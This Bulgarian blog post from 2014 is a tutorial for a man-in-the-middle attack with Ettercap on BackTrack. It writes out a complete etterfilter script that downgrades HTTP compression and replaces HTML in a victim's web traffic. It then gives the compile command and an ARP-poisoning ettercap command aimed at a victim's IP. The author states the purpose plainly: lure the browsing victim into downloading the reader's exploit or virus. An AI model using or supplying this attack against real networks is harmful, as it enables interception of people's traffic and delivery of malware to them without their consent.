събота, 22 февруари 2014 г.

Създаване плугин за Ettercap заместващ HTML код


Здравейте ще ви запозная с още една MITM атака .. За целта ползваме отново BackTrack дестрибуцията и Ettercap , като към него създаваме специален плугин заместващ HTML код. Така сърфиращата жертва лесно можете да я прилъжете да дръпне някой ваш експлойт или вирус.
Създаване на плугина:
  1. Създавате smb.filter файл със съдържание:
          if(ip.proto == TCP && tcp.dst == 80) {
          if(search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");

          msg("zapped Accept-Encoding!\n");
         }
         }
         if(ip.proto == TCP && tcp.src == 80) {
         replace("html код за заместване ", "нов html код");
         replace(
"html код за замесване", "нов html код");
         msg("Filter Ran.\n");
        }

         Пример:
     
    2.   Компилиране на файла - etterfilter smb.filter -o smb.ef
          След компилирането изхода трябва да е такъв или подобен:
                
                    -> Script encoded into 16 instructions.

    3. Стартиране на Ettercap-a
           
               ettercap -T -q -F smb.ef -M ARP /[ипто на жертвата]/ // -P autoadd -i waln0



Практически с тези операции можете да подмените всякакъв html код на жертвата.
Приятно тестване!